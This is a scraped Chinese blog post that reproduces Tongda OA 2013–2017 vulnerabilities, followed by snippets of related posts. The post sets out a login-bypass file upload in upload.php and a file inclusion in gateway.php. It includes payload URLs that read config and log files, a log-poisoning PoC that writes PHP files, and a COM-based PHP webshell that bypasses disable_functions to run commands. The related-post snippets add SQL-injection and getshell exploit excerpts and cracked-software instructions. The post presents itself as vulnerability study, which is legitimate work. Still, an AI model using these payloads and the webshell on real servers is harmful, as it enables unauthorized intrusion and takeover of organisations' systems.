通达oa 2013 php解密,通达OA漏洞学习 - 安全先师的个人空间 - OSCHINA - 中文开源技术交流社区...

最新推荐文章于 2024-07-09 00:00:00 发布
最新推荐文章于 2024-07-09 00:00:00 发布
阅读量737 收藏
点赞数 1
文章标签: 通达oa 2013 php解密

47e6aab5c74aab532a2ad7f5aaaaf36a.gif

说明

通达OA漏洞在去年上半年已爆出,这不趁着周末没事做,将源码下载下来进行复现学习。

文件包含测试

文件包含检测,payload1:

ip/ispirit/interface/gateway.php?json={"url":"/general/../../mysql5/my.ini"}

利用文件包含访问mysql.ini,检查是否有某些特定字符串 ,比如innodb_log_group_home_dir

6f028d7dabbe5faef07d6a6a23ba1330.png

payload2:

ip/ispirit/interface/gateway.php?json={}&url=/general/../../nginx/logs/oa.access.log

利用文件包含访问OA日志

dac70d4ade98f325ee1ecae143730eb5.png

复现

源码下载

链接:https://pan.baidu.com/s/1HP5pDsAK2QLOWpnB1JX-Yg提取码:vab0

是个exe,安装解压完是php代码。用Sublime打开,都是16进制加密

f3bac2dd2e0c7d11ef1be730d48ddc1b.png

用notepad打开显示,zend加密,

561564c51526362700a5c3ccaab4b39a.png

php在线解密网站:http://dezend.qiling.org/free.html

解密出源代码。

文件上传

ispirit/im/upload.php

要上传首先需要绕过登陆验证,在本系统中auth.php是登陆验证的相关逻辑,但在upload.php未修复前,如果$P非空就不需要经过auth.php验证即可执行后续代码。利用此处逻辑漏洞可绕过登陆验证直接上传文件。

712d9a14d8b79058f954314db2e98bb8.png

经过下载源码测试,上传后的文件在MYOA/attach/im/2003/目录下。因上传后的文件不在根目录,所以无法直接利用,因此需要进行文件包含。

02c23804469cad3f060ea4e9782ab9f4.png

文件包含

6bbf3c07d2185dc0f7735c2e25d1cdae.png

与上传相反,这里不传P参数就可以文件包含。未修复前,可通过精心构造json进入47行的includ_once进行文件包含。官方在补丁中过滤了 ,防止用户读取其他目录文件。

POC

poc有很多,其一,首先构造url并访问,在日志中写入一句话,原理是OA默认会将访问url,agent写日志。

/ispirit/interface/gateway.php?json={}&a=<?php  file_put_contents('1.php','hello123');?>

先在浏览器访问,

71bdd57bd768a86bc53f99f2ca52d354.png

发现"

cbbfcaea8a83cf4701461fc8f575cd69.png

用burp重新发包。

e21786b9dbc6f88594f81268c82ef182.png

成功写入日志。(写日志的方式省去了上传)

36e36828a8cd8481b85ca61c78513bd5.png

文件包含

2c864521c8f6296a13e6470222a955cb.png

如果php poc 为<?php file_put_contents('1.php','hello123');?>

则上传到 存在漏洞文件 gateway.php 同级目录,如果php poc为<?php file_put_contents('../1.php','hello123');?>,则上传到 上一级目录 ispirit 目录下。注意路径。

exp

通过 upload.php 上传一个文件,可自定义后缀名。经过下载源码测试,上传后的文件在MYOA/attach/im/2003/目录下。

思路一:

上传一个写shell的php文件,在利用文件包含写shell。

具体见exp.py。

思路二:

执行cmd,

MYOA/bin/ 目录下的 php.ini 禁用了一些执行,命令的函数。

disable_functions = exec,shell_exec,system,passthru,proc_open,show_source,phpinfodisable_classes =

参考

使用com组件绕过disable_functionshttps://www.cnblogs.com/-qing-/p/10944118.html

eg:

<?php $command=$_GET['a'];$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能$exec = $wsh->exec("cmd /c".$command); //调用对象方法来执行命令$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>

这里写的exp总是将post数据自动url编码。达不到burp的效果。

8cce962ef7d813d0340e6d9489734a17.png

a3fc6ca99b71dfd00bdcfa4966c0cb8e.png

需要先设置一次请求头setHeader("Content-Type", "application/x-www-form-urlencoded")再将数据拼接成string格式再进行发送 ,终于写成了exp2.py。

版本路径

不同环境路径不同。

例如2013:/ispirit/im/upload.php/ispirit/interface/gateway.php例如2017:/ispirit/im/upload.php/mac/gateway.php

后记

一些趣事,正常该用post包含的。

e6c5007dde0df47d3dbded2f8ef34f53.png

get包含就很玄学了。正常get请求(不空行)是不行的,在浏览器GET请求也是不能包含的。

ae897ece66356e0eda35b2af289cc59d.png

注意看我光标位置。必须空出来一行,否则不成功。get无请求体,不知道是什么原因。

c4183fa1a10ccb4726b72c3a8dcbe88b.png

空两行试试

b9291746596dbe330c14e0d4711925c0.png

发包,Content-Length都有了,可真牛啊。

9449bd84c682b0d1ee725889fbe7ea12.png

wireshark抓个包,get没请求体呀。见strange-get-include.pcap。

26f7cee8c2013788b9ba4b89e6462716.png

往期精彩

753a11436688cb6241bb6f91c65ba10e.png

感兴趣的可以点个关注!!!

关注「安全先师」

把握前沿安全脉搏

weixin_39842937
关注
漏洞复现-通达OA通达OA身份认证绕过漏洞
xiaokp7的博客
02-18 541
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA 2013-通达OA2017存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
通达 php解密,全网首发 | 通达OA多枚0day漏洞分享
weixin_39702335的博客
03-19 900
之前曝光过通达OA 0day我这里就不曝了,截止到发帖时,下面的漏洞都是未正式公开的。影响范围:我测试的是通达OA11.5版本,也就是2020年04月17日发布的,其他版未测,但我想也会有吧。HW这几天看到大家对通达OA的热情度很高,正好今天有空,下载了一个通达OA 11.5版本下来做代码审计,通达OA的代码是加密的,所以需要一个SeayDzend工具解密,百度上就能找到。解密后,对代码的各个模块...
通达OA interface/go.php 注入漏洞批量检测脚本+利用
课嗨教育的专栏
02-19 3790
目录 批量检测: 稍微改动下,getshell脚本: python写的,fofa 4000目标检测出来1200+存在: 批量检测: # -*- coding: utf-8 -*- import requests,sys import argparse import urllib3 import ssl import vthread urllib3.disable_warnings() ssl._create_default_https_context = ssl._create_unve
漏洞复现】通达OA 2013-2015 turn SQL注入漏洞
最新发布
凝聚力安全团队
07-09 484
通达OA 2013-2015 turn 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
通达 oa 2010 php 源代码 解密
11-03
通达OA2010版本,完整general目录下php文件无加密,示例: <?php /*********************/ /* */ /* Version : 5.1.0 */ /* Author : RM */ /* Comment : 071223 */ /* */ /*********************/ include_once( "inc/auth.php" ); if ( $LOGIN_THEME != "10" ) { $query = "SELECT * from INTERFACE"; $cursor = exequery( $connection, $query ); if ( $ROW = mysql_fetch_array( $cursor ) ) { $IE_TITLE = $ROW['IE_TITLE']; } echo "<html>\r\n<head>\r\n<title>"; echo $IE_TITLE; echo "</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n[removed][removed]\r\n[removed]\r\nself.moveTo(0,0);\r\nself.resizeTo(screen.availWidth,screen.availHeight);\r\nself.focus();\r\n\r\nrelogin=0;\r\nfunction exit()\r\n{\r\n if(document.body.clientWidth-event.clientX<50||event.altKey||event.ctrlKey)\r\n {\r\n"; if ( $ISPIRIT == 1 ) { echo "return;"; } echo " var req = new_req();\r\n\treq.open(\"GET\", \"relogin.php\", true);\r\n\treq.send('');\r\n }\r\n}\r\n\r\n[removed]\r\n</head>\r\n"; include_once( "inc/antivirus.txt" ); echo "<frameset rows=\"50,*,20\" cols=\"*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame1\" <frame name=\"banner\" id=\"banner\" scrolling=\"no\" noresize=\"noresize\" src=\"topbar.php\" frameborder=\"0\">\r\n <frameset rows=\"*\" cols=\"200,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame2\">\r\n <frame name=\"leftmenu\" id=\"leftmenu\" scrolling=\"no\" noresize=\"noresize\" src=\"ipanel\" frameborder=\"0\">\r\n <frame name=\"table_index\" id=\"table_index\" scrolling=\"no\" src=\"table.php\" frameborder=\"0\">\r\n </frameset>\r\n <frame name=\"status_bar\" id=\"status_bar\" scrolling=\"no\" noresize=\"noresize\" src=\"status_bar\" frameborder=\"0\">\r\n</frameset>\r\n</html>\r\n"; exit( ); } include_once( "inc/utility_all.php" ); include_once( "inc/td_core.php" ); include_once( "inc/chinese_date.php" ); include_once( "inc/sys_function_all.php" ); ob_end_clean( ); 本资源(仅供技术学习,版权归原公司所有)
通达oa 2013 php解密,通达OA2013集团版SQL注入+root
weixin_36330238的博客
03-18 225
### 简要描述:dd### 详细说明:http://www.tongda2000.com/oa/group/试用登录http://www.day900.com/注入点:http://www.day900.com/general/workflow/list/getdata.php?TYPE=2&RUN_ID=&RUN_NAME=&FLOW_ID=all&TIME_O...
td.rar_http server_td-scdma_vmeet.php_zlch_通达OA
09-19
1. 首先安装好通达OA(默认OA安装目录是d:\MYOA,以下说明以此为准)。 2. 下载以下文件,并安装至OA安装目录(也可以使用正式版光盘中的安装文件): http://www.zlchat.com/oa/zlchat2_tdoa.rar 3. 运行通达...
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
PHP解密软件
12-19
PHP解密软件,可以支持各种版本的php解密,查看源代码不再难
通达OA2013增强版全部源码
06-19
通达OA2013增强版反编译全部源码,二次开发可以使用参考。
通达oa清空密码
11-27
通达oa清空用户密码
通达OA2017-10.16破解
10-13
通达OA2017破解补丁安装步骤: ============================= 1、到官网下载OA2017最新版服务端安装包、用户PC端办公精灵、手机端下载址:http://www.tongda2000.com/download/2017.php 2、安装OA服务端到电脑或服务器或云主机或VPS主机 3、安装完,在OA服务管理器(MYOA\BIN\monitor.exe)中关闭所有OA服务,并退出服务控制器monitor.exe。 4、替换补丁中bin和webroot里的文件。直接复制粘贴就可以。 5、到D:\MYOA\BIN目录运行monitor.exe 并启动OA所有服务 6、检查OA所有服务是否正常开启。 7、在OA服务端上打开浏览器,输入http://localhost按提示升级(如果设置了端口的,末尾加上:端口号) 如果未出现“开始升级”,请检查MYOA\webroot\attachment\update下是否有lock.txt,有测删掉后重新打开OA登录页面,点击开始升级!!! 8、登录OA后按F5刷新网页,并到【系统管理】=》【系统资源管理】=》【资源监控】=》【系统缓存数据】=》更新系统缓存数据。 9、系统管理--&a mp;gt;定时任务管理-->检查系统更新-->设置-->关闭系统更新!!!!这步一定要做!要仔细检查! 正式使用时删除演示数据 10、到【系统管理】=》【系统资源管理】=》【演示数据清理】=》根据需要全删除或只删除单位、部门、用户、工作流。然后做一次第8步刷新OA缓存。
通达OA2013_6.16.130718政府版
10-22
经过测试完整可用,全部报表全开!没有任何限制
通达oa2015 php解密,通达OA /interface/auth.php SQL注入
weixin_36318586的博客
04-02 668
通达OA 两处注入点:```/interface/auth.php/general/score/flow/scoredate/result.php```主要原因还是由于宽字符导致的。MYSQL的字符集转换过程1. MySQL Server收到请求时将请求数据从character_set_client转换为character_set_connection;2. 进行内部操作前将请求数据从charac...
通达oa 2013 php解密,通达OA 2011-2013 通杀GETSHELL修复补丁
weixin_30320081的博客
03-18 238
此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.EXP:第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys...
漏洞复现】用友 U8-cloud api_hr sql注入漏洞
凝聚力安全团队
06-27 443
用友 U8-cloud api/hr 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品upload.jsp存在任意文件上传漏洞
通达OA v2017 action_upload.php高危任意文件上传漏洞解析
通过使用FOFA工具(一个开源安全漏洞扫描器),可以快速定位到安装了通达OA且版本为2017的应用程序,比如那些标记为"TDXK-通达OA"的应用实例。 POC(Proof of Concept,漏洞验证方法)提供了一个具体的示例,展示...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值